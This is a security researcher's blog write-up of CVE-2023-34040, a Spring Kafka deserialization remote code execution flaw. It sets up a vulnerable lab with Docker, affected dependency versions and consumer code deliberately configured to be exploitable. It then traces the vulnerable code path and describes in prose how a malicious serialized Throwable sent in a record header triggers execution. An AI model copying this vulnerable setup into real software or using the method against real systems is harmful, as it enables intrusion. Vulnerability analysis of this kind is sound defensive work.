CVE-2023-34040 Spring Kafka Deserialization Remote Code Execution
=================================================================
BY PYN3RD
2023-09-15 (Updated: 2023-09-18)
##### [](https://pyn3rd.github.io/2023/09/15/CVE-2023-34040-Spring-Kafka-Deserialization-Remote-Code-Execution/#0x01-Preface "0x01 Preface")0x01 Preface
Here is the explicit description about Spring Kafka deserialization vulnerability in Vmware security bulletin.

Reference
[https://spring.io/security/cve-2023-34040](https://spring.io/security/cve-2023-34040)
According to the description in security bulletin, we can simply attain some critical points resulting in the vulnerability.
1. Setting the `ErrorHandlingDeserializer` as a key and/or value in the Kafka record in configuration.
2. Setting the boolean type properties `checkDeserExWhenKeyNull` and/or `checkDeserExWhenValueNull` to **true**.
3. The users can publish a Kafka topic without any verification.
##### [](https://pyn3rd.github.io/2023/09/15/CVE-2023-34040-Spring-Kafka-Deserialization-Remote-Code-Execution/#0x02-Concepts-of-Kafka "0x02 Concepts of Kafka")0x02 Concepts of Kafka
Before deeply diving into the vulnerability, we promptly review some relevant concepts of the Kafka service.

* Producer:we call the object for publishing record **Kafka topic producer**
* Topic:The records are classified by the Kafka service, and each classification is named **Topic**.
* Broker:The published messages are stored in a group of servers, we call it Kafka cluster. Each of the server is a **Broker**. The consumer can attain the data form **Broker** and consume more than one topic.
* Consumer:The object which is used to subscribe message and handle with the published message is called **Kafka topi consumer**. The consumption messages are topic based.
Moreover,it is necessary to review the structure of Kafka record.

Kafka Record, we also call it **Message** or **Event** consisting of **Header** and **Body**. The header data virtually equals to **Metadata** including the basic elements like Topic, Patition and Timestamp. They are stored as a pair of key/value. The body data usually are the relevant business data stored as key/value constructure as well.
##### [](https://pyn3rd.github.io/2023/09/15/CVE-2023-34040-Spring-Kafka-Deserialization-Remote-Code-Execution/#Preparation "Preparation")Preparation
Zookeeper server is required before deploying Kafka service.
1.Installing Zookeeper server by docker
1
docker run -d --name zookeeper -p 2181:2181 -t zookeeper:latest
2.Deploying Kafka server by docker
```
docker run -d --name kafka -p 9092:9092 \\
\-e KAFKA\_ZOOKEEPER\_CONNECT=192.168.5.102:2181 \\
\-e KAFKA\_ADVERTISED\_LISTENERS=PLAINTEXT://192.168.5.102:9092 \\
\-e KAFKA\_LISTENERS=PLAINTEXT://0.0.0.0:9092 \\
\-e TZ="Asia/Shanghai" \\
wurstmeister/kafka:latest
```
3.Spring Boot project imports the affected Kafka dependencies
Affected version:
* 2.8.1 to 2.9.10
* 3.0.0 to 3.0.9
```
<dependency>
<groupId>org.springframework.kafka</groupId>
<artifactId>spring-kafka</artifactId>
<version>2.8.11</version>
</dependency>
```
4.Updating the configuration in `application.yaml`

5.Classes for demonstration
1)Kafka Producer Class
```
package com.example.SpringKafkaDemo.producer;
import com.example.SpringKafkaDemo.model.KafkaMessage;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.\*;
import java.util.HashMap;
@RestController
public class KafkaProducer {
@Autowired
private KafkaTemplate<String, String> kafkaTemplate;
@PostMapping("/message/send")
public String sendMessage(@RequestBody KafkaMessage message) {
String topic = message.getTopic();
String data = message.getData();
HashMap<String, String> headers = message.getHeaders();
ProducerRecord<String, String> producerRecord = new ProducerRecord<>(topic, data);
for (String s : headers.keySet()) {
if (s.equals("springDeserializerExceptionKey")) {
String exceptData = headers.get(s);
byte\[\] exceptHandler = KafkaProducer.hexStringtoBytes(exceptData);
producerRecord.headers().add(s, exceptHandler);
continue;
}
producerRecord.headers().add(s, headers.get(s).getBytes());
}
kafkaTemplate.send(producerRecord);
String jsonString="{\\"code\\":\\"200\\", \\"status\\":\\"success\\"}";
return jsonString;
}
private static byte\[\] hexStringtoBytes(String hexString) {
byte\[\] excepetionMessage = new byte\[hexString.length() / 2\];
for (int i = 0; i < excepetionMessage.length; i++) {
excepetionMessage\[i\] = (byte) Integer.parseInt(hexString.substring(i \* 2, i \* 2 + 2), 16);
}
return excepetionMessage;
}
}
```
By the way, here we use a type of design pattern in Java Language, **Template Method Pattern**. In this demonstration, I insert a template named `kafkaTemplate`.
Highlight of the code fragment
```
private KafkaTemplate<String, String> kafkaTemplate;
```
2)Kafka Consumer Class
```
package com.example.SpringKafkaDemo.consumer;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.stereotype.Service;
@Service
public class KafkaConsumer {
@KafkaListener(topics = "my-topic", groupId = "my-group-id")
public void consume(String message) {
System.out.println("Received message: " + message);
}
}
```
3)Config Class for the Consumer
```
package com.example.SpringKafkaDemo.config;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.serializer.JsonDeserializer;
import java.util.HashMap;
import java.util.Map;
@Configuration
@EnableKafka
public class KafkaConsumerConfig {
@Value("${spring.kafka.bootstrap-servers}")
private String bootstrapServers;
@Value("${spring.kafka.consumer.group-id}")
private String groupId;
@Bean
public Map<String, Object> consumerConfigs() {
Map<String, Object> props = new HashMap<>();
props.put(ConsumerConfig.BOOTSTRAP\_SERVERS\_CONFIG, bootstrapServers);
props.put(ConsumerConfig.GROUP\_ID\_CONFIG, groupId);
props.put(ConsumerConfig.AUTO\_OFFSET\_RESET\_CONFIG, "earliest");
props.put(ConsumerConfig.KEY\_DESERIALIZER\_CLASS\_CONFIG, JsonDeserializer.class);
props.put(ConsumerConfig.VALUE\_DESERIALIZER\_CLASS\_CONFIG, JsonDeserializer.class);
return props;
}
@Bean
public ConsumerFactory<String, String> consumerFactory() {
return new DefaultKafkaConsumerFactory<>(consumerConfigs());
}
@Bean
public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
factory.setConsumerFactory(consumerFactory());
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
return factory;
}
}
```
In acordance with the vulnerablity description in official bulletin, we should set both the `checkDeserExWhenKeyNull` and `checkDeserExWhenValueNull` properties to **true**.
```
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true)
factory.getContainerProperties().setCheckDeserExWhenValueNull(true)
```
Se the breakpoint at the `getExceptionFromHeader` function and then have the server start.

Step into `invokeIfHaveRecords` function, the record object will be deserialized.


Back to the `getExceptionFromHeader` function.

This function makes the value `springDeserializerExceptionKey` of `record.headers()` into the the value of the variables `headerName` and be delivered `header`.
And then deliver the value to `byteArrayToDeserializationException` function.

Step into `byteArrayToDeserializationException` function.

The `resolveClass` function is overrided to restrain arbitrary Java class deserialization. Actually, we can find the way of preventing Java deserialization vulnerability in many projects, like Apache Shiro, Fastjson.

Apparently, only the class
`org.springframework.kafka.support.serializer.DeserializationException` can be deserialized.

Step into `DeserializationException` function, it consists four arguments. One of them is `cause` which is used to invoke instantial class.

Write a malicious class and make it inherit the parent class `Throwable`.

Eventually, fill the value of the `springDeserializerExceptionKey` key in JSON data with the generated Java serialization. The remote code execution is trigged after send the HTTP request.

暂无评论